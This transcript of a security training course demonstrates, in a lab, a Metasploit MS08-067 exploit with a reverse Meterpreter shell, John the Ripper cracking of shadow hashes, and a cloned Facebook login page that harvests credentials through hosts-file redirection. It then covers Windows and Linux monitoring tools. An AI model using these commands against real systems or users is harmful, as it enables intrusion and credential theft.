essentially a tool that we can use for penetration testing so that we can perpetrate remote attacks over the
network against other hosts. And we do this by using specific exploits that are available within the framework
and payloads. Payloads are essentially chunks of code that we can run on a remote system. So the payloads are
designed to work together with an exploit. So currently I'm running an nmap scan on a host that I know is
running Windows XP. Now, the reality is, of course, you would have to scan the network to see if there was
anything that looked vulnerable in the first place before you knew exactly which exploit and payload to use
against that host. So what I'm looking for here is port 445. Now, if we take a look at the Windows XP
target [The screen switches to cmd.exe command prompt window.] and run netstat -an, we can see indeed that
port 445 is actually open, and it's in the listening state. This is a scary problem, we never want this for a
machine that's exposed, especially to the internet. So what now? [The screen switches back to root@kali:/
command prompt window.] Well, we're going to clear the screen, and we're going to type, msfconsole to get
into the Metasploit Framework command line console. This is going to make all of the exploits and payloads
that we need to pair together available for us. Allowing us also to set some variables, like the IP address of the
remote host, so that we can run the exploit against it. Now that we're in the msf interactive prompt, the first
thing we can do is type show exploits to get an idea of how many of these exploits are actually there. So you
need to have a sense of which exploit you want to use, and that can be done with some very basic searching or
through experience in using the Metasploit framework.
So we can see the list that has scrolled by of various exploits that are available, and especially related to
Windows and VNC and client buffer overflows and so on. At the same time, we can also type, show payloads
to see the payloads that are available that we would pair with those exploits. And remember that payloads are
essentially pieces of code that we actually would end up running on a remote system when we exploit it. So we
have a list here available as well. So what we're going to do in this case is, we're going to type use exploit/. And in our example we want to take advantage of port 445, which is the SMB, or Server Message Block, port that we saw was available on that host. So we're going to use exploit/windows/smb. And with a bit of research, we can figure out exactly which exploit we need to use, which I've already gone and done. So I'm going to go ahead and enter it here, and I'll press Enter. [Dan executes the following command: use exploit/windows/smb/ms08_067_netapi. The prompt changes to msf exploit(ms08_067_netapi).] And it puts
me in to that exploit, so I'm ready to work with it. So for that exploit, I'm going to set the remote host variable
RHOST to the IP of the target, which in this case is 192.168.1.242. Now, I know that because the nmap scan
revealed that it had port 445 open. Okay, so now that that's done, I'm going to set the appropriate payload to
pair with that exploit. So set payload, again, this requires a bit of research ahead of time, unless you're used to
using these all the time already. So I'm going to put in the path for that, I'm going to use reverse_tcp. [He
executes the following command: set payload windows/meterpreter/reverse_tcp.]
And now that I've already set my remote host variable RHOST, I'm going to have to set my local host or
LHOST variable, which is going to be the IP address of the machine where I'm running this. Where I want any
return traffic to come back to. So I'm going to say set LHOST 192.168.1.91. That is the IP address of this
Linux host. I'm going to set a port too, so set LPORT, let's say, 1234. And now I'm going to run the exploit by
typing in exploit. The thing to be careful of with this is to be patient. So depending on your network and the
type of exploit you're trying to run, it may take longer than you might expect before you get a response back.
So just be patient, we're going to go ahead and wait a minute and then see what happens. Okay, so it worked.
We can now see it detected that it was a Windows XP machine and it opened up a Meterpreter session. So this
is good news from the sense of being able to successfully exploit port 445 on that host. So now if I were to
type ipconfig, it's actually running on that remote machine. Also, if I were to type shell, it's going to give me a
remote Windows shell, even though I'm here in Linux running the Metasploit framework.
So from here, I can do pretty much whatever I please on that Windows host. [He executes the dir command.] I
can get files there, delete files, poke around, and so on. In this video, we took a look at how to work with the
Metasploit framework.
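Pulled together, the console session demonstrated above looks roughly like this, using the same module, addresses, and port from the demo:

msfconsole
use exploit/windows/smb/ms08_067_netapi
set RHOST 192.168.1.242
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.1.91
set LPORT 1234
exploit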
Learn how to use Kali Linux tools to further understand the tools attackers use.
Objectives
[Topic: Exploring the Kali Linux Suite of Tools. The presenter is Dan Lachance.] In this video, we'll take a
look at Kali Linux. [The Kali Linux Downloads page of the www.kali.org web site is open. Running along the
top of the page are six tabs, which are Blog, Downloads, Training, Documentation, Community, and About
Us. The Downloads tab is selected by default. The page also includes a Download Kali Linux Images section
that lists various Kali Linux images with their size and version.] Kali Linux is a free downloadable distribution
of Linux with hundreds of security tools built in. It stems from the older BackTrack distribution, which in turn grew out of the earlier Auditor security collection, although those projects have since been discontinued. Here on the kali.org
webpage, we have the option of downloading ISO images for Kali Linux, whether it's 64 or 32-bit. And you
can run it right from the ISO, even by burning it to a DVD. When you boot up you even have the option of
installing it on a local hard disk. With most versions of Kali Linux, you log in as user root, R-O-O-T, and the
password is T-O-O-R, in other words, root backwards. So, once we're into Kali Linux, we have a GUI
environment. [The Kali Linux GUI is open on screen. Running along the top is a menu bar with Applications
and Places drop-down menus. The taskbar is present on the left-hand side of the screen.] Although, when you
boot up, you do have numerous options to choose from. Here I've selected the default, which takes me into the
GUI mode. From the Applications menu up in the upper left, we can go through all the different categories of
tools, such as Information Gathering, or Reconnaissance Tools. [Dan clicks the Applications menu. A drop-
down list appears that has various options such as Information Gathering, Vulnerability Analysis, and so on.
He points to the Information Gathering option and a flyout menu appears that has various options such as
dmitry, nmap, sparta, and so on.]
So we can see for instance over, there we've got options like nmap and even the graphical sparta tool, which
can use other things in the background like nmap to do discovery of devices on the network. We've got
Vulnerability Analysis where we've got tools available. Web Application Analysis, Database Assessment
Tools, even Password Attacks such as the John the Ripper tool. We've got Wireless Attacks so that we can
crack into WEP, WPA, or even WPA2 protected wi-fi networks. We've also got a number of Exploitation
Tools such as the Metasploit framework, and the social engineering toolkit or SE toolkit. In the Sniffing and
Spoofing section we've got the standard options like Wireshark for packet sniffing. We've also got interesting
tools like driftnet, which allows us to view images that others are viewing on the network, literally, as in
pictures. There are other Forensics tools available here. We've also got some Reporting Tools, and then we've
got the Usual Applications of course that are available in any Linux distribution. In the left hand bar we can
also start a Terminal shell [He clicks the Terminal icon from the toolbar to open the root@kali:~ terminal.] if
we want to do stuff at the command line. Now some of the tools available in Kali Linux are graphical based,
whereas others are entirely done at the command line. In this video we learned about Kali Linux.
In this video, you will learn how to crack passwords.
Objectives
[Topic: Password Cracking. The presenter is Dan Lachance.] In this video, I'll demonstrate how to crack
passwords. [The root@kali:~ command prompt is open.] Password cracking can be done using many different
techniques, from social engineering, where we trick someone that's unsuspecting into divulging their password.
Or we might use some kind of brute-forcing tool like John the Ripper, which we'll examine here, which can
take a list of possible passwords and apply it against an account until it gets a match. Or we might use some other kind of tool to spoof an entire website, where we fool people into going to that website to put in their credentials, giving us an easy way to get passwords that way as well. We could even
use tools that would look at the resultant hash of a password and reverse-engineer it mathematically to try to
derive the originating password. So there are many ways to do it. Let's start here in Kali Linux by using the
command useradd to create a user called jdoe. [Dan executes the following command: useradd jdoe.] We'll
then use the passwd or password command to set a password for that account. [He executes the following
command: passwd jdoe. He is prompted to Enter new UNIX password.] This is the account that we're going to
try to brute force using the John the Ripper tool included in Kali Linux. [He is prompted to Retype new UNIX
password, which is then updated successfully.] Now if I cat the /etc/passwd file and grep it for jdoe, [He
executes the following command: cat /etc/passwd | grep jdoe.] then we're going to see our newly created user.
However, we don't see the password and that's because the password is in the shadow file. Let's bring up that
previous command but let's just change the file name from passwd to shadow. [He executes the following
command: cat /etc/shadow | grep jdoe.] Okay, now we can see user jdoe and then after that we see a colon
which is the delimiter for all the different items in this file, followed by this long password hash.
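As a hedged illustration only, a shadow entry follows a colon-delimited layout along these lines, where the second field holds the salted password hash (a $6$ prefix indicates SHA-512 crypt); the values shown here are made up, not the ones from the demo.

jdoe:$6$examplesalt$exampleHashValue1234567890:17800:0:99999:7:::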
We're going to use the unshadow command to put the contents of these two files together for ease of trying to
crack the password. So I'm going to type unshadow /etc/passwd /etc/shadow and then we're going to give it an
output redirection symbol. I want this to be called password_files. Okay, now why don't we take a look here.
Let's use the vi command and go into /usr/share/john because we're going to use John the Ripper tool. I want to
take a look at the password list file that's supplied here. Of course, it could be modified, you could use
different languages, different types of terms like legal or medical terms. [He executes the following command:
vi /usr/share/john/password.lst.] So here, for instance, notice I've added a first entry here, a variation of Pa$$w0rd. That is actually what I set as the jdoe password. Now it's not always going to be as simple as brute
forcing with a list of passwords and cracking the password. Sometimes it works, other times it doesn't. But the
nice thing about using a tool like John the Ripper is that it automates the attempts. You don't have to try it
manually. Bear in mind, if you use some kind of a brute force tool like this, it could actually lock out the
account, if intruder detection has been enabled. You know, maybe for example after three incorrect login
attempts, one after another, the account's locked for a day.
That is possible. However, as we go through this password list file, we've got all kinds of different words,
common words that are commonly used as passwords like 123abc, so we could modify this. There are plenty
of them that you could go ahead and download here as well. Just be careful if you see any of the more
offensive items in this password file but the reality is you're going to see some of those things out there. Okay,
let's get out of here. So I'm going to type :q for quit to get out of vi, or VI, the text editor. [The screen goes
back to the command prompt.] And now what we're going to do is actually go ahead and attempt to crack a
password. So I'm going to type in john, because that's the command to run the John the Ripper Password
cracking tool. --wordlist=/usr/share/john and we just looked at the file, it's called password.lst. So here we go,
password.lst, and then I'm going to give it our combination of our /etc password and shadow files which were
called password_files. I'm going to go ahead and press Enter [He executes the following command: john --
wordlist=/usr/share/john/password.lst password_files.] and we can see it's currently doing its work. So,
how long it takes will depend on how many passwords you have in your list file and so on.
Now, we've set up this example so it would be very simple and quick and we can see immediately the
password for user jdoe. So it's done that and it's associated with user jdoe by looking at the hash in that file. So
once this is complete, then we're ready to go. I'm going to interrupt this with Ctrl+C because we've got what
we need. Now you can also use the john command with --show and ask it to show any passwords that it's
determined already. [He executes the john --show password_files command.]
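For reference, the complete sequence of commands used in this demo, from creating the account through showing the cracked result, looks roughly like this (the account name, wordlist path, and the password_files name are the ones used above; your own wordlist will obviously differ):

    # Create the test account and set its password
    useradd jdoe
    passwd jdoe

    # Combine /etc/passwd and /etc/shadow into one file for John
    unshadow /etc/passwd /etc/shadow > password_files

    # Run a wordlist attack against the combined file
    john --wordlist=/usr/share/john/password.lst password_files

    # Display any passwords John has already cracked
    john --show password_files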
So here it tells me that the password for jdoe is, well, the variation of the word password. Although in the file,
it's a hash of it, isn't it? It's not the actual password, but here it's displaying the actual password that we could
actually use to log in as that user. Now, that's one type of way of cracking passwords. You can brute-force it,
not always effective, it also might end up locking accounts. However, it can be useful in some cases. Now,
another way that we can work with this is by essentially mimicking common websites that people would
frequent and spoofing the whole website. Basically setting up our own fake web server like for Facebook,
which we'll do in this example. Here in Kali Linux, I'm going to type setoolkit which stands for social
engineering toolkit. I'm going to go ahead and press Enter and now notice I'm in a different interactive prompt
that has SET for Social Engineering Toolkit. [The screen prompts to select from the listed menu options such
as: 1) Social-Engineering Attacks, 2) Fast-Track Penetration Testing, and so on.] So what I want to do then is
I want to start the Social Engineering Toolkit, so I'm going to go ahead and press number 1 for Social
Engineering attacks. [The screen again prompts to select from the listed menu options such as 1) Spear-
Phishing Attack Vectors, 2) Website Attack Vectors, and so on.] What I'm interested in then doing is a website
attack vectors, so number 2. [The screen now displays another set of menu options such as 1) Java Applet Attack Method, 2) Metasploit Browser Exploit Method, 3) Credential Harvester Attack Method, and so
on.] The next thing I want to do is credential harvesting, so I'll press number 3. [The screen again displays
menu options such as 1) Web Templates, 2) Site Cloner, and so on.] I want to clone a website so I'll press
number 2. And it wants me to pop in the IP address for my Kali Linux machine, not the website. So here I'm
going to pop in 192.168.1.91. Then it asks me to put in the URL for the site that I want to clone. I'm going to put
in www.facebook.com. Looks like I put that in incorrectly, so I'm going to have to try that again.
Let's try that again. Site cloner, put in my local IP address, it helps when you type things in correctly. So let's
try this again, www.facebook.com. Now what it's doing is cloning the website so that it will actually be
running on that machine, it looks like the real deal. So you can see here in a web browser, [The screen
switches to a web browser. The http://192.168.1.91/ address is present in the address bar of the browser. It
displays the Facebook login page, which includes fields for username and password, and a Log In button.] if I
actually connect to my Kali Linux installation, it actually looks like the real Facebook site. So of course, what
this would require is to redirect users to this IP address, which could be done by compromising their system
and editing the hosts file or maybe making an entry in a DNS server that you've compromised. So here, I've put
in the name and the password, I'll go ahead and click Log In. Interestingly, the user actually gets redirected to
the real page, [The Facebook login page opens which has the following web address:
https://www.facebook.com/login.php.] so therefore what's interesting here is it's kind of stealth, the user doesn't
even know what's happening. Let's go back and check Linux. So back here in Linux, I'm going to go ahead and
type 99 to return back to the main menu. And then of course, I'm going to finally exit this entire tool. The next
thing to do to review the results is to go into the /var/www/html folder. [The screen switches to Kali
terminal.] And if you do an ls, you'll see a harvester file there. If you cat that file to view its contents and
perhaps pipe it to more, in case it's really long, [He executes the following command: cat harvester_2016-09-
16\ 11\:07\:02.664969.txt | more.] then you're going to start seeing some interesting information. Here I can
see [email protected], and I can see the entered password. Now remember that user doesn't really suspect that
that was a fake login page. They were redirected to the real thing and successfully got into Facebook. So, here
we have an easy way essentially of tricking people into divulging passwords. So, it's important, then, to make
sure that people's machines can't be compromised so hosts file entries can't redirect them to fraudulent sites and
that DNS servers are hardened so that they can't be compromised. In this video, we learned how to crack
passwords.
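As a footnote to the redirection point above, this is what a single malicious hosts file entry might look like on a compromised victim machine (the IP address is the Kali host from this demo; the entry is purely illustrative):

    # Linux: /etc/hosts    Windows: C:\Windows\System32\drivers\etc\hosts
    192.168.1.91    www.facebook.com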
Table of Contents
After completing this video, you will be able to recognize the importance of continuous monitoring of various
systems.
Objectives
[Topic: Reasons for Monitoring. The presenter is Dan Lachance.] In this video, I'll talk about reasons for
monitoring. In order to effectively manage and maintain a network environment and all of the hosts and applications it consists of, we need to be constantly monitoring all aspects of the network to ensure that everything is performing well, and also to ensure that our security controls are effective in protecting assets.
So with monitoring, we can identify changes that might have occurred that can change the security impact of a
system. So for example, if we've got remote desktop being enabled on a server, we might want a notification to
that effect. Because maybe we don't use remote desktop in our environment. Instead, we use remote
management tools from a client to get to the Windows server. So, monitoring can also bring to light poorly designed controls that might even have been effective at one point in time but are ineffective currently. So
monitoring provides ongoing oversight as to what's happening on the network and to its hosts. And to the
applications used by and running on those hosts. At the auditing level, this only works correctly if everybody is
using a separate user account when they perform network activities. Whether they're an end user or an IT
technician creating user accounts.
Transactions can also be inspected in the case of database applications, so that we can track exactly what's happening, with the correct date and time source, and who started the action, or which device or application started it. Monitoring can also be tweaked to focus on cyber defense, where we can
monitor our network infrastructure, which includes devices like routers, switches, wireless access points, VPN
appliances. Now there are many ways that these can be monitored. The old standard that's been used for
decades is SNMP, the Simple Network Management Protocol, where, from a central management station, we
can reach out over the network to these SNMP compliant devices. And basically, poke and prod any statistics
that they might make available through SNMP. In some cases, we might even be able to reconfigure those
devices through SNMP. Now of course, monitoring can also apply to all of our user devices, and also servers.
We might even install an agent on those operating systems to report back detailed information periodically.
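Going back to the SNMP example for a moment, here's a rough sketch of what polling a device from a management station can look like, assuming the net-snmp command-line tools are installed and the device allows SNMPv2c reads with a community string of public (both of those are assumptions, not part of this demo environment):

    # Read a single value: the device's system description
    snmpget -v2c -c public 192.168.1.1 sysDescr.0

    # Walk the interface table to see which traffic counters the device exposes
    snmpwalk -v2c -c public 192.168.1.1 IF-MIB::ifTable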
Security information and event management, or SIEM, is a standard in the IT industry.
It's a monitoring standard that's used to detect anomalies, and then to prioritize and manage those incidents. Now, just as is the case with a raw intrusion detection or prevention system, often, SIEM
systems need to be tweaked for a specific environment. Due to legal or regulatory reasons, we might not have a
choice but to monitor our network or specific applications. Or to set triggers for certain types of transactions
that occur, such as high-volume financial transactions. In the cloud, there is something known as CMaaS,
which stands for continuous monitoring as a service. So instead of having an on-premises continuous
monitoring solution running on our equipment, it can be run through the cloud. Monitoring is also beneficial in
the sense that it can show us areas where there are inefficiencies, where we can optimize performance. Either
of the network as a whole, or individual hosts or processes within applications. So we can ensure also that
network and systems are used properly and only by authorized users. In this video, we discussed the reasons
for monitoring.
During this video, you will learn how to distinguish the difference between common monitoring tools.
Objectives
[Topic: Common Monitoring Tools. The presenter is Dan Lachance.] In this video, I'll talk about Common
Monitoring Tools. Of the many monitoring tools available for IT networks and hosts, they share many
common features. Some monitoring tools are real-time, where they are constantly watching for certain types of
changes and they can alert or even do something about it immediately. And in some cases, this type of real-time monitoring solution requires an agent to be installed, where that's possible, such as on an operating system.
Monitoring tools can also do a historic analysis of data to determine, for example, if there are anomalies or
times that are missing from log files. All monitoring tools should have the ability to have configurable
notifications, whether we are notifying technicians through SMS text messages, through email and so on. In
some cases, monitoring tools will also have the built-in capability of auto remediation. Where, when
something is detected, it automatically gets fixed. So, for example, if our monitoring system detects that the
Windows firewall is not enabled on a laptop, it can automatically turn it on for additional security. But in order
for that to work, there would need to be some kind of software agent running on the Windows machine. And
that's exactly what happens when we use things like network access protection in Windows environments.
There is a client-side agent or service running that allows that to be possible. Log files can be monitored
whether we're looking at the Windows environment or UNIX and Linux. In Windows, there are numerous Event Viewer logs: for the operating system, for products like PowerShell, Internet Explorer, DNS, TCP, group policy, the list goes on and on. Now the reality is, we probably don't have time to pore over all of
these logs on each and every Windows host.
So it can be configured such that when we view a log, it is filtered. We can even build a custom view log
where we only display things that are of interest, such as warnings or critical errors and so on. The same type
of thing is possible with UNIX and Linux. Now, in UNIX and Linux, log files for most software exist
under /var/log. Here on a Windows Server 2012 machine, I've gone into the Windows Event Viewer and I'm
looking at the standard Windows System log. [The Event Viewer window is open. Running along the top is a
menu bar with menus like File and Action. Below that is a toolbar with various icons like back and forward
arrows. The rest of the screen is divided into four parts. The first part lists the folders of the Event viewer such
as Custom Views and Windows Logs. The Windows logs folder is expanded and it has various options such as
Application, System, and so on. The System option is selected by default. The second part displays the contents
of the option selected in the first part. It lists the events in the system in a tabular format. The table headers
are Level, Date and Time, Source, Event ID, and Task Category. The third part displays the details of the
event selected in the second part. The fourth part is titled Action and it lists the available actions for the
system and the selected event.] Well, we can see there are logs that have a level of error, information, warning
and so on. Now one of the things that we could do here is we could sort, for example, by Level. [Dan clicks
the Level table header in the second part.] So, this way we have the ability to essentially group together all of
the errors, all of the informational messages, and all the warnings. Although they won't be in chronological
order any longer. But another option is to build a Custom View. Over on the left, if I were to expand Custom
Views, I could then right-click and choose Create Custom View. [from the shortcut menu. The Create Custom
View dialog box opens. It contains two tabs, Filter and XML. The Filter tab is preselected, which displays
various filters to select from.] Now, here what I might do is build a Custom View that shows me only Error,
Critical, and Warning messages. But I can get even more detailed with my filtering because I can do it by
specific logs. So, here for instance, under Windows Logs, I'll just choose the System log. And perhaps down
under Applications and Services Logs, I'll choose Microsoft > Windows, and I'm just going to keep going
down here. And maybe for this example I'll choose GroupPolicy. So now I'm asking for Critical, Warning and
Error log entries from those specific logs. I can also specify specific event ID numbers, which indicate a
certain type of event has occurred, or I can use keywords, or do it by user or computer. But for now, I'm just
going to click OK, [The Save Filter to Custom View dialog box opens. It includes text fields for Name,
Description, and buttons such as Ok and Cancel.] and I'm going to call this Nothing But Trouble. And then I'll
click OK. So we now have a Nothing But Trouble custom log view.
And we can see over on the right, that it's filtered out, the only thing we're really seeing are Errors, Warnings
and so on. To take that a step further, I could even right-click onto my custom view listed in the left-hand
navigator. [He right-clicks the Nothing But Trouble custom view and a shortcut menu appears. It lists various
options such as Open Saved Log, Create Custom View, Attach Task To This Custom View, and so on.] And
what I can do is attach a task to that view. [He selects the Attach Task To This Custom View option and the
Create Basic Task Wizard opens.] Essentially, as I go through this wizard, I could then determine exactly what
it is that I want to do. Maybe start a program, send an e-mail message or display a message. So basically, we
can trigger something to happen when we get a new log entry in this specific custom view. [He cancels out of
the wizard.] Now at the enterprise, large scale level, you'd probably be using some kind of a SIEM solution,
which gives you many more capabilities. But in some cases, some of these options built into the operating
system can actually be very useful. As we mentioned, we might use a SIEM, a security information and event
management solution, to monitor activity on the network and devices and applications, even in real-time. So
we can monitor data, looking for threats, and SIEM solutions even have the ability to contain and manage
incidents as they occur. Of course, we've also got the standard, raw tools. And the reason I say raw is because, you know, a SIEM solution could include intrusion detection and prevention, but outside of a SIEM solution we have these raw individual capabilities, including intrusion detection systems or IDSs, which can be host-based or network-based. Intrusion detection systems can detect
anomalies and report on them or send notifications, but they don't do anything about it. Whereas, intrusion
prevention systems, be they host or network-based, not only detect anomalies and send alerts or notifications or write that information to logs, but they can also be configured to take actions to prevent the intrusion from completing. Supervisory control and data acquisition is often referred to as SCADA. This is a
monitoring tool set that is used in industrial environments. So, similar to SIEM, it has the ability to monitor all aspects of the network or industrial equipment and then report on it in real time. In this video, we talked
about Common Monitoring Tools.
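As an aside to the Event Viewer filtering shown above, a similar Critical/Error/Warning query can be run from the command line with the built-in wevtutil tool (a sketch; in the event schema, level 1 is Critical, 2 is Error, and 3 is Warning):

    :: Show the 20 most recent Critical, Error, and Warning entries from the System log
    wevtutil qe System /q:"*[System[(Level=1 or Level=2 or Level=3)]]" /c:20 /rd:true /f:text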
In this video, you will learn how to monitor the Linux operating system.
Objectives
[Topic: Linux OS Monitoring Tools. The presenter is Dan Lachance.] Linux and Unix operating systems
certainly allow us to do things from the command line but also in some cases with GUI interfaces. In this video
we'll explore Linux command line OS monitoring tools. [The root@kali:~ command prompt is open.] There
are plenty of tools built into Linux that we can use to monitor various aspects of the system. The first one we'll
take a look at here is top. Now remember that Linux commands are case sensitive, so the fact that I'm typing this in lowercase letters actually matters. Now when I type in top and press Enter, I get a list of running processes
where the top users of things like CPU utilization are listed at the top of the list. And the ones that are putting
the least amount of load on the percent CPU utilization are listed further down the list.
So notably we can see the PID in the leftmost column, the process ID, followed by the USER that spawned
that process. Now in some cases the system itself will spawn processes. Further over to the right, we can see
the percent of CPU utilization and percent memory being consumed by a given running process along with the
actual command itself, listed in the rightmost column. There are also some statistics up at the top, like how
long the system has been up and running, how many users are connected, the load averages over the last
periods of time. It tells me that there are 207 tasks running in total and so on. But we can interact with this
while we're working with it. For example, if I press the letter d, I get asked to change the delay from the screen
output from this command from three seconds to something else. Maybe I'll type 0.5 and press Enter. And we
can immediately see that our update is much more frequent. I'm going to press d and we're going to go back to
every three seconds. So I'll type in 3 and press Enter.
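Incidentally, the refresh interval can also be set when top is launched rather than interactively, and as we'll see shortly in the man page, there's a batch mode switch (-b) that writes samples out non-interactively so they can be reviewed later (a small sketch):

    # Start top with a half-second refresh instead of pressing d afterwards
    top -d 0.5

    # Batch mode: take 5 samples, 3 seconds apart, and save them to a file
    top -b -n 5 -d 3 > top_samples.txt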
But there are other great things we can do here in top as well. For instance, maybe we don't want to see all of
these columns of information. We're only interested in a few. So how do we filter them out? If I press the letter
f, and of course I'm not holding Shift, so it's not an uppercase F, it's just a regular lowercase f, it takes me into
this screen where I can manage fields. So f for fields. In the left-hand column we can see whether or not there's
an asterisk next to a field name. And if there is an asterisk, it's currently being displayed. So basically, you use the arrow keys to move up and down, and you can toggle the display of a field on and off by using your
space bar. So if I hit the space bar for a bunch of these fields I don't want to see, then the asterisk is removed,
which means that they will not appear in the screen output. And maybe I want to sort by something other than
CPU utilization, maybe by %MEM for memory. So I'll go down with my arrow keys and highlight that one,
and then what I can do is press the letter s to sort by that. Now you might say, nothing changed on the screen,
when in fact it did, if you look in the upper right. It says the current sort field is %MEM. You see, if I highlight
%CPU and press s, now up in the upper right it says current field that is being sorted is %CPU. So I'm going to
go back and sort it by memory.
Now that I'm happy with this I'll press the letter q for quit. And we're back in the top command, where we still
have a live updating changing screen every three seconds. However, we're missing some columns and now it's
sorted by percent memory instead of percent CPU. So I'm going to go ahead and press q to quit out of here. In
Unix and Linux we have manual or man pages which are help pages for Linux commands. So maybe I want to
know more about how to use the top command, maybe in batch mode where I can start writing things to files
instead of having to babysit it in real time while I watch it on the screen. So for instance, if I were to type man
space top, it opens up the man page for the top command and as I go further down, I'll just press on the Enter
key here. As I go further down through this man page, I can see all of the different ways that this command is
designed to work. And eventually, as I go further down, I'll see the various command line switches such as -b
to run in batch mode. Now the idea here is, batch mode can send output, for instance, to a file, so we can examine our monitoring output later instead of having to view it in real time. So I'm going to go ahead and press q
to get out of that man page. Now some other interesting commands in Linux and there are plenty of them,
includes things like the ps command to list processes. When I type ps with no parameters it only shows me the
running processes in this current session. So we've got our bash Linux shell, which is allowing us to type
things in the first place.
And of course at the time it was executing, ps was executing, so it shows up as well. We can also see the
process ID assigned to each of these processes in the leftmost column. However, things get interesting if I start
using command line switches like aux to view all processes, including other users' processes, where the x means processes that aren't tied to a terminal, that is, things that are started up by the system. [Dan executes the
following command: ps aux.] So if I do that I get a very big output. Now of course, I use the up arrow key to
bring that back. I could pipe that using my vertical pipe symbol, which I get by shifting the backslash key. I
can pipe that to more to stop after the first screen full. [He executes the following command: ps aux |
more.] This way I can see the column headings at the top. So from the left we've got the user column followed
by the process identifier, %CPU, %MEM, and so on. In Unix and Linux, we could also pipe the result of a
command like ps aux to grep where we might filter for something specific. Here, I want to get information
about the running process called sshd, the ssh daemon which allows remote command line administration. [He
executes the following command: ps aux | grep sshd.] And in this case I can see that I've got a couple of
entries, ignore the last one which of course is us grepping for sshd in the first place. But I do see the first listing
here where it's referencing my ssh daemon which is running on this host. So if we want to, we can filter those
types of things out. Also in Linux, other interesting things we can do, for instance, at the disk level, is we
might use df or disk free. [He executes the df command. The output appears in a tabular format with the
following table headers: Filesystem, 1K-blocks, Used, Available, Use%, and Mounted on.] Now what I might
want to do, instead of doing this in 1k blocks is use df -h for human readable. [The output now contains a Size
column instead of the 1K-blocks column.]
Then instead, it's a little bit more readable, where I'm reading the megabytes or, technically, the mebibytes. And the difference really is that a megabyte is 1000 kilobytes, where a mebibyte, and yes, that's what I said, mebibyte, is actually 1024 kibibytes. So there is a little bit of a difference in how some Linux distributions will display things. And technically, a mebibyte is not exactly the same thing as a megabyte. Other things I might
be interested in using for monitoring here built into most Unix and Linux distros is the tcpdump command.
This one is really cool because it's kind of like having a built in command line packet sniffer and it's been there
for decades. For instance, if I type tcpdump -i for interface, now that's a lower case i, remember case
sensitivity is important. I'll give it the name of my interface which I know is eth0. If you're not sure, you can
type ifconfig on your Unix or Linux host. I just press Enter, it's capturing everything and it's scrolling by very
quickly. So I'm going to interrupt that by pressing Ctrl+C and I'll type clear to clear my screen. I'll use the up
arrow to bring up tcpdump command. What I want to do here is capture traffic destined for a specific host. So
I'll put in the IP address here, where it's going to port 22.
So dst for destination followed by a space and the destination IP. Then after that we've got a space, the word
and, a space, the word port, and a space and 22. So I only want to capture stuff going to that IP address,
specifically to port 22. And I can also pass a -A to view everything in ASCII form instead of hex. [He executes
the following command: tcpdump -i eth0 dst 192.168.1.91 and port 22 -A.] So now we can see ssh traffic that
applies to that specific type of connection that we asked for. I'll press Ctrl+C to interrupt that. Last thing we'll
mention about tcpdump is you may want to write that stuff to a file. So I'll just bring up our previous
command, and I'll add another switch after a space. What I'm gonna add is a -w, which means write, and I'm
going to put that in a file called, let's see, capture1.cap. [He executes the following command: tcpdump -i eth0
dst 192.168.1.91 and port 22 -A -w capture1.cap.] Okay, so now I can see tcpdump is listening, normally we
would see in this case ssh traffic, we're not seeing it because instead it's being redirected to our .cap file. This
can be useful because you could let this run for a period of time, you can even schedule it as a cron job in Unix
or Linux, and then review the reports of what's been captured at some point in the future. We're going to go
ahead and press Ctrl+C to stop the capture, it tells me a few packets were captured. Finally I can use tcpdump -
r to read in that file capture1.cap. [He executes the following command: tcpdump -r capture1.cap.] And there's
the data that was captured. In this video we talked about Linux OS monitoring tools.
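To recap the tcpdump workflow from this demo, and to illustrate the cron scheduling idea mentioned above, the commands look roughly like this (the interface name, IP address, and file names are from the demo environment; the crontab line is only an illustration):

    # Capture traffic destined for one host on port 22, displayed in ASCII
    tcpdump -i eth0 dst 192.168.1.91 and port 22 -A

    # Same capture, but written to a file for later review
    tcpdump -i eth0 dst 192.168.1.91 and port 22 -w capture1.cap

    # Read the saved capture back
    tcpdump -r capture1.cap

    # Example crontab entry: capture 1000 packets every night at 1:00 a.m.
    # 0 1 * * * /usr/sbin/tcpdump -i eth0 -c 1000 -w /root/nightly.cap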
In this video, you will learn how to monitor the Windows OS.
Objectives
[Topic: Windows OS Monitoring Tools. The presenter is Dan Lachance.] In this video, I'll demonstrate how to
work with Windows OS monitoring tools. Much like Unix and Linux operating systems, the Windows
operating systems, both client and server-based, contain a number of great built-in monitoring tools. Here in
Server 2012 R2, let's start by going to our Start menu and typing in perf, P-E-R-F, so that we can start up the
Windows Performance Monitor tool. The Performance Monitor tool has been built into the OS for quite a long
time, and it's still as useful as it was from day one. [The Performance Monitor tool window opens. Running
along the top is a menu bar with various menus such as File, Action, and so on. Below that is a toolbar with
various icons such as back and forward arrow. The rest of the window is divided into two parts. The first part
is the navigation pane that has a root folder named Performance. The root folder is selected by default. Below
that are three expandable folders, namely Monitoring Tools, Data Collector Sets, and Reports. The
Monitoring Tools folder is expanded and it lists the Performance Monitor option. The second part displays the
contents of the option selected in the first part. The second part is divided into two sections, Overview of
Performance Monitor and System Summary.] So I'm going to click on the Performance Monitor in the left-
hand navigator, [The second part of the window is now divided into two sections. The first section has a
toolbar at the top with various icons such as plus, pause, and so on. It also displays a real-time graph of
percent Processor Time. The second section displays a table with following table headers: Show, Color, Scale,
Counter, Instance, Parent, Object, and Computer. The table lists the processes for which the graph appears in
the first section.] where by default, we've got a real-time graph that shows us the percent processor time in
total for all processor cores. Now I could click the green plus sign at the top of this tool, [Dan clicks the plus
icon from the toolbar. The Add Counters dialog box opens. It is divided into two sections that are Available
counters and Added counters.] where I can add additional performance counter metrics that I want to monitor.
They're all categorized here alphabetically. And this list is coming from the local computer, although I could
browse the network for other remote computers and monitor them remotely. Now depending on what's
installed on the local server will determine which categories we have here, some are here no matter what. For
instance, if we're working with IPv4, well, you're always going to have that here. But whether you've installed other server roles like DNS or DHCP or SQL Server, for instance, will determine the
additional counters that you might actually see in this list. So I'm going to scroll down here to the P's, where
what I want to look for is Physical Disk.
And I'll expand that category and you can see, when you do that, you see the individual performance counter
metrics listed underneath. So I think what I'll do here is just look at the average disk queue length, which is an
indication of how many requests for disk I/O are queued up because the disk subsystem is already too busy.
Now, you need a baseline of normal activity before you can hit the panic button. Just because you've got some
value in, for instance, the average disk queue length, it will vary from one environment to another. Naturally,
in a busy disk I/O environment on a file server, you can expect higher values in the average disk queue length
than on a server that is not a file server, maybe it's just a DHCP server. So I'm going to choose that for all disk
instances, but notice I could choose a specific disk instance. So I'll choose All instances, I'll click Add, which
